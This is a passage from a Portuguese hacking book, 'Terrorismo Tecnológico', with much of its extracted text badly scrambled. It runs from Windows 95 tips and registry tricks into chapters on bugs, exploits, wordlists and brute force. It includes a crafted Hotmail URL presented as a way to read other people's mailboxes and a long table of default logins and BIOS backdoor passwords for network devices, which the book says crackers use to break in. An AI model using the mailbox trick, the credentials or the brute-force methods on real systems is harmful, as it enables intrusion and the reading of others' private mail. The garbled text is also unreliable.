s

esempenho d

Para aumentar o desempenho do seu Windows 95 troque os drivers gráficos padrões do Windows 95 para os novos drivers mais recentes dos fabricantes de sua placa gráfica. Segundo a Windows Co

Terrorismo Tecnológico Aprenda Para Sobreviver

280

su devemos levar em conta tes de hardware tiveram

ais de 6 meses para extrair o melhor desempenho do Windows 95. que estamos falando de placas gráficas, se você está pensando

ca ideade VRAM. Não se esqueça de v ficar se esta placa é compatível c

15.7.17 Atualizando de 4 Mb para 8 Mb de RAM

a isto é que o programa de instalação do Windows 95 instala diferentes arq m 4 Mb de RAM e

Mb de RAM;

ra não deletar um arquivo (ou grupo de arquivos acidentalmen ressionando Shift+Del você obtém o mesmo efei

a maioria são superiores aos drivers da Microsoft. Tambémque os fabrican

mJáem trocar a sua placa gráfica por outra, certamente você deverá fazer certas considerações como: pense em adquirir uma placa aceleradora gráfica, esta placa livra o trabalho daCPU além de aumentar a performance. Também pense em memória VRAM ao invês da DRAM, compre com no mínimo 2 Mb para sua placa gráfica, memória VRAM é mais cara mas também é muito mais rápida. A placa gráfi l seria aceleradora PCI com 2 Mb

eriom Plug & Play e está no Hardware Compability List da Microsoft.

Se você instalou o Windows 95 em um computador com 4 Mb de RAM e agoraatualizou seu sistema para 8 Mb de RAM, para tirar o máximo doWindows 95 é necessário re-instalar seu Windows 95. A razão par

uivos para computadores co8

15.7.18 Delete Arquivos Imediatamente Quando você pressiona a tecla SHIFT enquanto move arquivos para a lixeira, estes arquivos serão deletados imediatamente. Tenha cuidado ao utilizar esta opção pa

te. Pto.

Terrorismo Tecnológico Aprenda Para Sobreviver

281

Inicie o Windows 95 pelo diskete de sistema do mesmo, e digite: "A:\Unistall", isso pode ser feito também, iniciando o Windows 95 nor 5.

CD" e clique em Editar. Na lista de ções, selecione "Play" e clique em editar. gora, escreva na caixa de texto a linha de comando para chamar o

programa que voc Se você apagar or completo a linha, nada acontecerá quando você inserir um CD música no drive.

pastas e agora quer fechar todas, o modo ais fácil de fazê-lo é segurando Shift enquanto fecha a última

janela

15.7.19 Desinstalando o Windows 95

malmente, e executando o mesmo comando pelo Windows 9

15.7.20 Configurando o Autoplay para CDs de música Por padrão, o Windows 95 é configurado para começar o CD Player e tocar os CDs de música assim que inseridos no drive. Para mudar isso, vá no Windows Explorer, menu Exibir/Opções.../Tipos de Arquivos. Selecione "Audio aA

ê quer usar para tocar seus CDs.pde

15.7.21 Fechando várias pastas de uma só vez Se você abriu váriasm

(clicando no X no canto superior direito da janela.)

15.7.22 Abrindo o Prompt do MS-DOS em um diretório específico

Para abrir o Prompt do MS-DOS direto em um diretório que você

Terrorismo Tecnológico Aprenda Para Sobreviver

282

quiser, vá no Explorer, selecione o diretório, agora vá no menu Iniciar, Executar, digite Command e pressione OK.

15.7.23 Usand os no Prompt do MS-DOS

ar nomes de aruqivos longos em janelas DOS, basta e entre aspas. Exemplo: cd "Arquivos de Programas"

iciar o Windows para completar a is como fazê-lo sem ter que reiniar eqüência de boot: Clique no Menu

rá reiniciado!

5 Problema de Esvaziamento da Pilha (Memória Vazante)

, acusar falta de memória no sistema. Trata-se

e um problema do sistema operacional chamado vazamento de emória. Para corrigi-lo, instale o programa Kernel 32 Update.

15.7.26 Botão Iniciar

o nomes de arquivos long

Você pode uscolocar o nom

15.7.24 Reiniciando o Windows sem reiniciar todo o computador

uando você precisar rein

Qinstalação de algum programa, e computador e esperar toda a so

Iniciar, Desligar. Escolha Reiniar o Computador. Agora, mantenha a pressionada, enquanto clica no botão OK. Pronto, seu tecla Shift

indows seW

15.7.2

Quando você navega na Internet durante um periodo mais longoseu Windows 95pode dm

Terrorismo Tecnológico Aprenda Para Sobreviver

283

Aquele bo entro da arra! Clique Clique no botão e pressione as combinações de teclas lt + -". No menu que aparece, escolha a opção Mover. Agora use

tar o botão Iniciar. e truque só funciona se a opção Auto-ocultar da barra de

r desativada.

15.7.27 Propriedades

para obter rapidamente as propriedades de o clique nele enquanto você mantém

Se você, por algum motivo, escolh e

s lembrar-se que ma coisa, você pode mplesmente digitar 'WIN' quando a tela "Seu computador já pode

cer. Se quiser ir para o prompt CO80'. Isso acontece porque o

la gráfica, mas, na verdade, ele está em .

m impressos sem abrir o pro ama que os criou. Para executar essa tarefa, ser selecione os obje ados, clique neles com o botão direito do mouse e escolha Imprimir. Obs: Isso só funciona com aplicativos de 32 bits.

tão pode ser colocado em qualquer posição db"Aas teclas com setas de direção para movimen Esstarefas estive

No Windows 95, qualquer arquivo, dê um duplprecionada a tecla Alt.

15.7.28 Evitando ter que reiniciar o computador

er para desligar o computador precisa fazer mais algudepoi

siser desligado com segurança" apare

o DOS, simplesmente digite'MODEdWindows apresenta uma tem normal Prompt do DOSu

15.7.29 Impressão Rápida No Windows 95, arquivos registrados no sistema (DOC, BMP etc...) pode gr

tos desej

Terrorismo Tecnológico Aprenda Para Sobreviver

284

15.7.30 Renomeando a Lixeira do Windows 95 Abra o Registro, executando o arquivo Regedit.exe. No menu Editar, selecione a opção Localizar, na tela que surge, digite a palavra Lix o Win95 ncontrar o texto, aparecerá, na parte direita da tela, o seguinte: adrão) "Lixeira". Dê um duplo clique nessa opção. Agora é só

a a designação que você achar mais erá efeito depois que você reiniciar o

15.7.31 Teclas de Atalho F2 Renomear

3 Localizar

ar ou Colar

vo na

erbos alternativos no menu contextual

eira e espere alguns segundos. Quandoe(Prenomear a Lixeira par adequada. A mudança só tWindows 95.

F CTRL+X,C,V Recortar, Copi SHIFT+DELETE Excluir imediatamente sem colocar o arqui Lixeira. ALT+ENTER Propriedades ALT+clique duplo Propriedades CTRL+clique direito Colocar v Abrir com SHIFT+ clique duplo Explorar o objeto se houver um comando Explorar

Terrorismo Tecnológico Aprenda Para Sobreviver

285

CTRL+arrastar um arquivo até uma pasta Copiar um arquivo CTRL+SHIFT+arrastar um arquivo até a área de trabalho ou uma pasta Criar um atalho

TAB, SHIFT+F10 Abrir propriedades da barra de refas

4 (Explorer) Exibe a caixa de combinação

5 Atualiza

CTRL+G (Windows Explorer) Ir para CTRL+Z Desfazer

TRL+A Selecionar tudo

ACKSPACE Vai para a pasta pai

HIFT+<fechar> Fecha esta pasta e todas as suas pastas pais

indows Explorer

CTRL+ESC,ESC,ta

Controle geral sobre pastas/Windows Explorer F F F6 Alterna entre painéis no Explorer

C B S

No W

um* Expande tudo sob a seleção

N

Terrorismo Tecnológico Aprenda Para Sobreviver

286

Num- Expande a seleção Num+ ou Seta à direita Reduz a seleção Seta à direita Expande a seleção atual, se estiver reduzida; caso

ntrário, vai para a primeira pasta filha Seta à esquerda Reduz a eleção atual, se estiver expandida; caso contrário, vai para a pasta

i

cospa

Em Propriedades

CTRL+TAB/CTRL+SHIFT+TAB Alterna entre guias Propriedades

Nas caixas de diálogo normais Abrir/Salvar

4 Abre a lista de locais

F F5 Atualiza a tela Backspace Vai para a pasta pai se o foco estiver na janela de visualização

Comandos gerais apenas de teclado F1 Ajuda F10 Modo Vai para Menu SHIFT+F10 Menu contextual para o item selecionado

Terrorismo Tecnológico Aprenda Para Sobreviver

287

CTRL+ESC Acessa o menu Iniciar CTRL+ESC, ESC Foco no botão "Iniciar" SHIFT+F10 Menu contextual ALT+TAB Alternar para o programa em execução SHIFT enquanto insere o CD Ignora auto-execução Alt+M quando o foco está na barra de tarefas Minimiza todas as janelas

Teclas de acessibilidade

Teclado MS Natural Keyboard

Tocar SHIFT 5 vezes Liga/desliga Teclas de Aderência Manter pressionada SHIFT Direita por8 segundos Liga/desliga Teclas de Filtragem Manter pressionada NumLock por 5 segundos Liga/desliga Teclas de Alternação ALT Esq+SHIFT Esq +NumLock Liga/desliga Teclas do Mouse ALT Esq+SHIFT Esq+PrintScreen Liga/desliga AltoContraste

Win+R Caixa de diálogo Executar

Terrorismo Tecnológico Aprenda Para Sobreviver

288

Win+M Minimizar Tudo SHIFT-Win+M Desfazer Minimizar Tudo Win+F1 Ajuda do Windows Win+E Explorer Win+F Localizar Arquivos ou Pastas C

in+Tab Alternar entre os botões da barra de tarefas

Copie com outro nome o arquivo USER.EXE que se encontra no diretório "C:\Windows\System" e abra o mesmo num editor de Ícones depois opie o arquivo modificado para o mesmo diretorio. OBS: Faça ackup do arquivo entes de apagá-lo.

TRL+Win+F Localizar Computador

W Win+Break Tecla aceleradora de PSS... (propriedades de Sistema) Evitando que os últimos arquivos abertos sejam mostrados no menu Documentos Normalmente, não há como fazer isso, mas há um meio que resolve o problema: Primeiro, saia para o modo MS-DOS. Normalmente, os documentos são guardados na pasta \WINDOWS\RECENT. No DOS, apague a pasta RECENT. Por último, crie no diretório \WINDOWS um arquivo chamado RECENT, pois tendo um arquivo com o mesmo nome no mesmo diretório o Windows não poderá recriar a pasta assim que for iniciado.

15.7.32 Mudando o Ícone do MENU INICIAR

qualquer, e mude os ícones (de todos os tamanhos), cb

Terrorismo Tecnológico Aprenda Para Sobreviver

289

15.7.33 Um menu iniciar ideal

Comece tirando proveito de algumas configurações rápidas para personalizar o menu iniciar- não é necessária nenhuma edição do registro para este truque. Primeiro, inclua as pastas painel de controle, impressoras, rede dial-up, e lixeira no menu inicar. Para incluir esses itens vc precisa manipular os indentificadores de classe( ou CLSIDs), longas sequencias de números e letras que indentificam cada item do registro. O CLSDI do painel de controle é {21ec2020-3aea-1069-a2dd-08002b30309d}; da pasta de impressoras é {2227a280-3aea-1069-a2de-08002b30309d}; do acesso à rede dial up é {992cffa0-f557-101a-88ec-00dd010ccc48} e da lixeira é {645ff040-5081-101b-9f08-00aa002f954e}. Para incluir o painel de controle no menu iniciar faça o seguinte: Abra o windows explorer, e crie uma nova pasta no diretório windows\menu iniciar chamada Painel de Controle rápido.{21ec2020-3aea-1069-a2dd-08002b30309d} exatamente como está aqui, somente o nome antes do ponto pode ser trocado, o resto NÂO! Para vc fazer com os outros, siga os mesmos passos, mais com o número dele.

15.7.34 Explorer no meu computador! Dê um clique duplo no ícone Meu Computador para exibir as unidades de seu PC, impressoras e painel de controle. Não seria agradável se vc desse um clique duplo em meu computador e aparecesse algo útil como o explorer do windows? É fácil fazer isso: Primeiro clique em iniciar/executar e digite isso: regedit ; Depois de ter entrado nele, no lado esquerdo, expanda essas janelas: HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\SHELL. De um clique com o botão dieito e escolha

Terrorismo Tecnológico Aprenda Para Sobreviver

290

novo " chave, Digite open e presione enter. Dê um clique com o botão direito em open e escolha novo " chave. Digite command e presione enter. Dê um duplo clique em (padrão), digite: explorer /e,c:\windows e pressione enter! Lembrando que a pastinha meu computador, vai parar de funcionar, até vc remover o negócio da pasta!

15.7.35 Visualizar arquivos

Rápido! encontre aquele imagem para a apresentação!!! Não consegue lembrar o nome do arquivo? Eis uma ajuda que pode ajudar a acha-lo. Abra o registro para mudar o ícone padrão dos arq BMP para uma visualização instantãnea do conteúdo ( como acontece em sistemas macintosh). Localize essa chave: HKEY_CLASSES_ROOT/PAINT.PICTURE\DEFAULTICON. Altere o v r padrao para %1. Inicie o explorer e vc verá todas as imagens .BMP aparecerem em pequenininho!

1 7.36 Como trocar os ícones do Meu Computador e Lixeira?

Para alterar o ícone do meu computador faça o seguinte: abra o registro e localize essa chave: HKEY_CLASSES_ROOT\CLSID\{200D04FE0-3AEA-1069-A2D8-08002B30309D}\DEFAULTICON. De um duplo clique em (padrão) e coloque o ícone que deseja expecificando onde está o icone de da lixeira é um pouco mais com gistro tem 3 valores : (padrão), empty e full. Quando a lixeira está vazia, o ícone empty (vazio) é armazenado no (padrão), e qundo tá cheio o ícone full (cheio) tambem é armasenado no (padrão), então tende-se certificar de que ambos estejam corretos. Vou mostrar uma foto com minha lizeira vazia e mostrar. Para trocar o ícone, esvazie sua lixeira, e entre no regitro, depois vá até aqui :HKEY_CLASSES_ROOT\CLSID

uivos .

alo

5.

sejado. Para trocar o íconeplicado, porque dentro do re

Terrorismo Tecnológico Aprenda Para Sobreviver

291

{645FF040-5081-101B-9F08-00AA002F954E}\DEFAULTICON. Depois vc coloca o caminho dos ícones vazis, no (padrão) e no empty, depois o ícone cheio no valor full e pronto, depois vc tem de reiniciar!

15.7.37 As pessoas podem ler meu e-mail?

Sim, podem. Agora, isso não significa que há sempre alguém lendo a sua correspondência. Com milhões de pessoas na Internet, as novas mensagens individuais se perdem na multidão. Mas como voc sabe, quando uma mensagem parte do seu sistema, ela pode chegar a um outro computador localizado a centenas e até milhares de quilômetros de distancia, e você não tem como saber quem tem acesso a ela. Mesmo que ninguém leia a sua correspondência enquanto esta estiver em trânsito, o destinatário poderá encaminhá-la a quem bem desejar. Mas nem tudo está perdido - existem maneiras de tornar o seu e-mail mais seguro. Uma delas consiste em criptografar a sua mensagem antes de enviá-la. Criptografar significa simplesmente transformá-la em uma seqüência de códigos que só podem ser decifrados com a chave apropriada. Ao ser recebida, a mensagem deverá ser descriptografada no equipamento destinatário. Enviar mensagens pelo Netscape 2.02 e Internet Explorer 2 é relativamente seguro. Não sou hacker! Sou somente uma pessoa que adora computadores há muito tempo e com a Internet teve a chance de disponibilizar informações sobre informática para outras pessoas e assim haver a troca de informações. Também sou absolutamente contra a pirataria, ou seja a cópia de programas. Legalize sua cópia pirata! Também não existe nenhum livro ou material específico em como ser tornar um hacker. Não existe uma fórmula mágica e nem como se tornar um hacker do dia para a noite. Um hacker se faz após anos de muita leitura e estudo. Basicamente toda a informação que você necessita para se tornar um hacker já está disponível na rede, o que você tem que fazer é vasculhar e Está certo que isto não é uma tarefa muito fácil, mas quem disse que ser um hacker é

ê

achar as informações.

Terrorismo Tecnológico Aprenda Para Sobreviver

292

fácil? Qualquer um pode ser um hacker ou médico ou engenheiro ou etc

. Desde que você se informe e estude.

Terrorismo Tecnológico Aprenda Para Sobreviver

293

Capítulo XVI

BUGS - Falhas

Terrorismo Tecnológico Aprenda Para Sobreviver

294

16.1 Introdução

ordem. Essas falhas por mais insignificantes que possa parecer podem comprometer a segurança de uma rede inteira.

O grande perigo é em consciência e não faz as atualizações que são tão necessárias.

a, surge a partir do momento que o programador comete um erro. Por serem pequenos erros estes passam despercebidos e só são descobertos por algum hacker ou analista de segurança.

O falhas descobertas são feitas pelos próprios usuários do sistema op

Surge então aquele irritante aviso que o programa fez uma

Todos os sistemas possuem falhas sendo S.O., aplicativos, banco de dados...

Elas consistem em pequenos erros na criação e compilação dos programas, possibilitando que crackers os utilizem para tomar o controle de alguma máquina ou pelo menos causar uma des

o administrador que não t

16.2 Como surge o bug A máquina não erra e sim o homem. O bug, ou falh

s erros do Windows, por exemplo. As grandes maiorias das

eracional. Os criadores mesmo que têm o código fonte e conhecem o programa como a palma da mão raríssimas vezes percebem algum erro. Para ser mais seguro, um programa têm que ser testado de todas as maneiras possíveis. Coisa que não fazem mais hoje, pois o custo aumenta e as empresas querem lançar logo o software no mercado.

operação ilegal

Terrorismo Tecnológico Aprenda Para Sobreviver

295

16.3 Exemplos de falhas

acas. Se alguém tentar o primeiro m já con

tbios ativo em sua instalação. Sa

Erros de Active X possibilitam que ao visitar um site, o Internet

Explorer instale um programa no seu computador e o execute sem que você perceba. Preocupa-se em não abrir anexos de e-mail? Erros no Outlook fazem ceber os e-mails os anexos sejam executados automaticamente. No Outlook XP

algo urgente e ele

?

r e sim pra qualquer usuário. O Int t,

consiga possui

sendmail provavelmente o maior bu o

e aperte enter. Você entendeu algo do

O Windows 98 possui muitos erros e poe muitos nisso, mas três

são interessantes. O primeiro é que não consegue executar nem abrir nenhum link com a url c:\con\con . Se você tentar ir a iniciar e executar, o sistema travará e mostrará a famosa tela azul. Os outros dois são do netbios. O primeiro possibilita que você acesse o diretório system do Windows por um compartilhamento de impressora. É só mapear o compartilhamento padrão printer$. O último possibilita que se descubra a senha do netbios sabendo apenas o primeiro caractere. Por exemplo: coloco no disco C compartilhado a senha m

segue acesso à minha rede. O Windows 2000 também possui algumas falhas, como deixar o ne

indo um pouco dos sistemas operacionais, alguns programas também possuem falhas graves.

com que só de re

tentaram resolver este problema bloqueando a maioria dos anexosrecebidos, resultado você recebe um e-mail comfica bloqueado e você perde seus anexos, que inteligente não éAté existe formas de desbloquear, mas deveria ser mais fácil e nãocoisa apenas para um admistrado

ernet Information Server, servidor de homepages da Microsofpossui erros graves. Unicode, RDS, existem muitos. Um mais recente é uma falha no printer.isapi, fazendo com que se acesso ao Windows 2000 pelo IIS 5.0 . O sistema Unixmuitas falhas também, como no

g de todos e no Apache, mas é mais fácil exemplificar usandomaravilhoso sistema de Bill Gates. Um truquezinho: abra o Word, digite a função =rand(100,100)

aparece no Word após dar enter?

Terrorismo Tecnológico Aprenda Para Sobreviver

296

16.4 Buffer overflows O buffer overflow é um ataque usado há muito tempo e que ainda

será muito usado. Compreende em lotar os buffers (memória disponível para aplicativos incluir na sua lista de processos algum programa tal como um keylogger ou um trojan. To s os sistemas são vulneráveis a buffer overflows e a solução é a m

ue mais teve problemas de race condition até hoje é o sendmail , serviço de e-mail padrão do Unix. É possível encontrar falha entes.

lhas

ecam por erros de buffer overflow e outros, mas isso é coisa para um bom programador, já

e seria isitar páginas especializadas no assunto, que o cada dia publicam ovos tipos de erros descobertos. Algumas muito boas são a ecurity-focus (www.security-focus.com

) de um servidor e

doesma, procurar se já existem correções existentes. Novo buffer

overflows surge todo dia, até o XP já têm alguns.

16.5 Race condition O Race condition ou condição de corrida é mais comum no Unix

e no Linux. Consiste em fazer algum programa que rode como root (superusuário) executar alguma falha que possa lhe enviar para o shell do sistema. O programa q

s até em versões mais rec

16.6 Descobrindo se alguns sistemas têm fa Utilizando recursos de debug que ch

para o usuário é bem mais difícil descobrir algo. O interessantvnS ) em inglês.

Terrorismo Tecnológico Aprenda Para Sobreviver

297

16.7 Utilizando exploits

falhas. O exemplo

lgum computador, dor de comandos (ou shell).

ssim podendo fazer o que quiser com o sistema. Existe também o shack (sem o 2000), que utiliza um erro de buffer overflow do IIS .0 para fazer com que possa mandar o servidor executar qualquer

nde a uma falha, por so geralmente os grandes sites de segurança publicam os dois

ompiladores para rodar os exploits em ww.programmersheaven.com.

Exploit que checa mais de 200 vulnerabilidades de Unicode (IIS),

16.8 No Linux

linux também tem muitos erros, só no primeiro trimestre de 2003

ma falha na biblioteca para compressão de software utilizada em ncipal do sistema

uscetível a ataques de hackers. O bug, conhecido como buffer overflow (sobrecarregamento de

buffer), leva as funções principais do gerenciamento de memória no zlib a falharem e, nesta condição, permite que pessoas com conhecimento técnico aperfeiçoado assumam o controle de computadores Linux via Internet.

vulnerabilidade afeta qualquer versão do Linux que utilize a biblioteca zlib para descompressão, incluindo o software principal do sistema operacional - o kernel.

Exploits são programas criados para explorar

do printer .isapi do IIS 5.0, possui um exploit chamado iishack2000. Possibilita que somente digitando o IP de aconsiga acesso direto ao interpretaAii4tarefa (como um trojan). Cada exploit correspoisjuntos. Geralmente vêm em código-fonte C, Perl e alguns poucosem executáveis comuns.

Dicas: Cw

no site: http://tomktech.n3.net.

Oforam descobertos mais de 500 bugs diferentes. Utodas as versões do Linux pode deixar a parte pris

A

Terrorismo Tecnológico Aprenda Para Sobreviver

298

Segundo sites especializados, pa, vnc, Mozilla e muitos outros pro

cotes incluindo X11, rsync, QT, gcc gramas que têm a capacidade de utilizar o método de compressão estão potencialmente vul eráveis.

16.9 Correção

Depois de perceberem erros, alguns S.O. como o XP envia a Microsoft como ocorreu o erro, assim os programadores podem fazer correções e essas são distribuídas. São os famosos patches ou Service Pack. Toda vez que um erro for descoberto deve-se visitar a página do fabricante do programa e pegar a correção. Isso não pode ser feito a cada determinados tempos como 6 meses ou a cada dois meses, mas é no máximo uma em uma semana.

Microsoft (www.microsoft.com.br) , a Securenet (www.securenet.com.br) e a Anti-Hackers homepage (www.hackers.com.br) possuem algumas listas e grupos de informações a respeito dos bugs.

16.10 Outros Bugs

Os bugs como são erros de linguagem podem também ocorrer com paginas da Internet vejamos um encontrado no Hotmail:

aça como teste em outra caixa de mensagens sua já que é ilegal ler mensagens de outras pessoas!

Entre no hotmail e log-se normalmente com seu ID e SENHA

n

A

** F

Terrorismo Tecnológico Aprenda Para Sobreviver

299

Para ler menssagens de o http://pv2fd.pav2.hotmail.msn.com/cgi-bin

&domain=hotmail.com

utra caixa use o link.

/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e3 6%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d96 87%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom& hm___fl=attrd

Pare este ler mude os seguintes textos do url : M 22803%2e16 (Número ID da menssagem simplesmente conte como %2e=.) username (O usuário que você queira ler a menssagem) Se você quiser ler e-mails como "e-mailbox view"ao invés de visão

SG9433

completa. remova = "%26raw%3d0"

Se você não gosta do frame do hotmail em cima. remova "&hm___fl=attrd&domain=hotmail.com"

Terrorismo Tecnológico Aprenda Para Sobreviver

300

Capítulo XVII

Crackeando

Terrorismo Tecnológico Aprenda Para Sobreviver

301

17.1 Wordlists São listas com usuários e senhas. Quando se têm arquivos de

a d m stema de cripto DES a criptografia é inquebrável, porém programas como Cracker Jack pegam um

vo r ” lis ptografa nd e ma senhas Unix (D S) e compara

quiSe o programa encontrar algum usuário em que a criptografia

fi xa igua so é qu n nciona o nome lhe é in coloca mente, uma em

linarrato34

55479

.2 O processo de bruteforce

método da rç r o melhor de toas, e às vezes dias para conseguir uma resposta.

tiliza-se m r ma nta conectar-se a um sistema ndo toda as c inações possíveis de letras e números. Ele isso. Digamos que você peça para ele combinar os números ,3,4,5,6,7,8,9 ele fará as c ações possíveis ate ntrar a se ha M que possui uma conexão de 56

e um ium III, ou até um Pentium IV é muito icado que consiga descobrir a senha. Para se ter alguma

ance deve-se utilizar uma conexão dedicada (à cabo, via rádio e ) s comp es, por exemplo, em uma universidade te tos c ador numa sala e com uma Internet bem T 0 co ore ápidos tr a ada um em um

senh o UNIX co o si grafia

arqui criado “wo dlists tas de senhas comuns o criutiliza o o m smo siste das de Eos ar vos.

tenha cado eformado. As palavras são ha.

tamente l, is e a sedas vertical

ha fu

cadaC o M 12

...

17 O fo a bruta deve se dos. Mas pode

levar hor U u p ogra que te

utiliza s ombgera 0,1,2 todas ombinenco n . as um crackerkbps complch

utiliza Pent

outras e vário utadoronde m mui omput es veloz. endo 2 mputad s r abalh ndo c

Terrorismo Tecnológico Aprenda Para Sobreviver

302

seb, o o

tor (um tentando descobrir senhas começadas por a, o outro por utro por c,...) o tempo para se conseguir a senha diminuirá

de e . lo t c que po é b ais ráp do.

a o C ha Scan, tus NAT (Netbios itin ) são os melhor

17.3 Tabela completa

ora rei u bem rande e e A ALGUMA deve checá-la para ver se o seu

ema lner v so e er troqu s o mais rápido o ssív ara s r pa oteadores e outros dispositivos que pos enha ior nte já mo m la com as

principais senhas, mas eram as principais, aqui está à tabela completa, que os cracker utilizam para invadir e roubar as informações

reta o ro e end ssim nunca pegos pelos agentes de anç uidado e )

consi ravelm nte Já calmen e é laro o tem em m i O plicativ AIN, S dow Bru e

Aud g Tool es!

Ag mostra ma lista g la DE FORM

deve ser deixada de lado. Pois se sist está vu á el, ca stiv e esta enha

po el. É p e usada ra rsuam s s. (anter me strei u a tabe

di mente d t ador, s o asegur a c ntão!

anFabricte

toProdu Revisão

Protocolo Usuário Senha Nível de

acesso 3COM CellPlex 700

0 Telnet tech tech

3COM CoreBuilder 0/6

00

Telnet debug 700

000/3500/25

synnet

Terrorismo Tecnológico Aprenda Para Sobreviver

303

3COM CoreBuild 700

/

Telnet tech er 0/6

000/35002500

tech

3COM C Telnet adm (none) HiPerAR v4.1.x

3COM LANplex 250 Telnet debug synnet 0

3COM LANplex Telnet tech tech 2500

3COM LinkSwitch

2000/2700

Telnet tech tech

3COM

5x0 Telnet ORD

Office Connect ISDNRouters

n/a PASSW Admin

3COM NetBuilder O SNMP n/a ANYCM

3COM

2200

Telnet debug synnet SuperStack II Switch

3COM SuperStac 2700

Telnet tech tech k II Switch

3COM SuperStack II Switch

1100/3300

Telnet monitor monitor Monitor

3COM SuperStack II Switch

1100/3300

ager Telnet man manager

Manager

3COM SuperStack II Switch

1100/3300

n Telnet admi (none) Admin

3COM SuperStack II Switch

1100/3300

ity Telnet secur security Admin

3COM Telnet adm (none)

3COM Telnet admin net syn

3COM ager e Telnet man managr

3COM tor Telnet moni monitor

3COM Telnet read synnet

3COM Telnet security rity secu

3COM Telnet write synnet

Accelerated Networks

DSL CPE and DSLAM

Telnet sysadm t anicus

ADC Kentrox

Pacesetter Router

Telnet n/a secret

Adtran MX2800 Telnet n/a adtran

Advance PC BIOS Console n/a Advanc Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

304

d Integration

e

Alteon ACEswitch

180e

n HTTP admi admin Admin

Alteon ACEswitch

180e

n Telnet admi (none)

AMI PC BIOS Console n/a AM Admin

AMI PC BIOS Console n/a AMI Admin

AMI PC BIOS Console n/a A.M.I Admin

AMI PC BIOS Console n/a AMI_W

S Admin

AMI PC BIOS Console n/a AMI?SW

Admin

AMI PC BIOS Console n/a aammii Admin

AMI PC BIOS Console n/a AMI!SW Admin

AMI PC BIOS Console n/a AMI.KEY

Admin

AMI PC BIOS Console n/a AMI.KEZ

Admin

AMI PC BIOS Console n/a AMI~ Admin

AMI PC BIOS Console n/a I Admin AMIAM

AMI PC BIOS Console n/a AMIDECOD

Admin

AMI PC BIOS Console n/a AMIPSWD

Admin

AMI PC BIOS Console n/a amipswd

Admin

AMI PC BIOS Console n/a AMISETUP

Admin

AMI PC BIOS Console n/a BIOSPASS

Admin

AMI PC BIOS Console n/a CMOSPWD

Admin

AMI PC BIOS Console TD

n/a HEWIT RAN

Admin

Amptron PC BIOS Console n/a Polrty Admin

Apache Project script

OCKS

Apache "jj"

HTTP n/a SDGR User

APC MasterSwi9210

apc apc Admin tch

AP

APC SNMP

2.x apc apc Adapter

APC Call-UPS AP9608

Console n/a serial number of the Call-UPS

Admin

APC Share-UPS

AP9207

Console n/a serial number of the Share-

Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

305

UPS

APC Web/SNMP Management Card

AP9606

Multi apc apc Admin

APC Powerchute Plus

4.x for Netware 3.x/4.x

Console POWERCHUTE

APC Admin

Ascend Router Telnet n/a ascend Admin

AST PC BIOS Console n/a SnuFG5 Admin

Attachmate

Attachmate Gateway

Console n/a PASSWORD

Admin

AT&T 3B2 Firmware

Console n/a mcp Admin

Audioactive

MPEG Realtime Encoders

Telnet n/a telos Admin

Autodesk

Autocad Multi autocad autocad User

AWARD PC BIOS Console n/a Award Admin

AWARD PC BIOS Console n/a AWARD_SW

Admin

AWARD PC BIOS Console n/a SW_AWARD

Admin

AWARD PC BIOS Console n/a lkwpeter Admin

AWARD PC BIOS Console n/a LKWPETER

Admin

AWARD PC BIOS Console n/a ?award Admin

AWARD PC BIOS Console n/a 256256 Admin

AWARD PC BIOS Console n/a admin Admin

AWARD PC BIOS Console n/a alfarome

Admin

AWARD PC BIOS Console n/a aLLy Admin

AWARD PC BIOS Console n/a aPAf Admin

AWARD PC BIOS Console n/a award Admin

AWARD PC BIOS Console n/a AWARD SW

Admin

AWARD PC BIOS Console n/a awkward

Admin

AWARD PC BIOS Console n/a BIOS Admin

AWARD PC BIOS Console n/a biosstar Admin

AWARD PC BIOS Console n/a biostar Admin

AWARD PC BIOS Console n/a CONCAT

Admin

AWARD PC BIOS Console n/a condo Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

306

AWARD PC BIOS Console n/a CONDO Admin

AWARD PC BIOS Console n/a CONDO,

Admin

AWARD PC BIOS Console n/a HELGA-S

Admin

AWARD PC BIOS Console n/a HEWITT RAND

Admin

AWARD PC BIOS Console n/a HLT Admin

AWARD PC BIOS Console n/a j322 Admin

AWARD PC BIOS Console n/a j64 Admin

AWARD PC BIOS Console n/a lkw peter

Admin

AWARD PC BIOS Console n/a lkwpeter Admin

AWARD PC BIOS Console n/a PASSWORD

Admin

AWARD PC BIOS Console n/a SER Admin

AWARD PC BIOS Console n/a setup Admin

AWARD PC BIOS Console n/a SKY_FOX

Admin

AWARD PC BIOS Console n/a SWITCHES_SW

Admin

AWARD PC BIOS Console n/a Sxyz Admin

AWARD PC BIOS Console n/a SZYX Admin

AWARD PC BIOS Console n/a t0ch20x Admin

AWARD PC BIOS Console n/a t0ch88 Admin

AWARD PC BIOS Console n/a TTPTHA

Admin

AWARD PC BIOS Console n/a TzqF Admin

AWARD PC BIOS Console n/a wodj Admin

AWARD PC BIOS Console n/a zbaaaca

Admin

Axis NETCAM 200/240

Telnet root pass Admin

Axis Printserver

540/540+

Multi root pass Admin

Bay Networks

Router Telnet Manager (none) Admin

Bay Networks

Router Telnet User (none) User

Bay Networks

SuperStack II

Telnet security security Admin

Bay Networks

Switch 350T

Telnet n/a NetICs Admin

Bintec Bianka Multi admin bintec Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

307

Routers

Biostar PC BIOS Console n/a Biostar Admin

Biostar PC BIOS Console n/a Q54arwms

Admin

Breezecom

Breezecom Adapters

4.4.x

n/a Helpdesk

Admin

Breezecom

Breezecom Adapters

4.x n/a Super Admin

Breezecom

Breezecom Adapters

3.x n/a Master Admin

Breezecom

Breezecom Adapters

2.x n/a laflaf Admin

Cabletron

Netgear modem/router and SSR

netman (none) Admin

Cabletron

routers & switches

(none) (none)

Cayman Cayman DSL n/a (none) Admin

CGI World

Poll It v2.0

HTTP n/a protection

User/Admin over package

Cisco CiscoWorks 2000 admin cisco Admin

Cisco CiscoWorks 2000 guest (none) User

Cisco ConfigMaker cmaker cmaker Admin

Cisco IOS Multi cisco cisco

Cisco IOS Multi enable cisco

Cisco IOS 2600 séries

Multi n/a c

Cisco IOS Multi n/a cc

Cisco IOS Multi n/a cisco

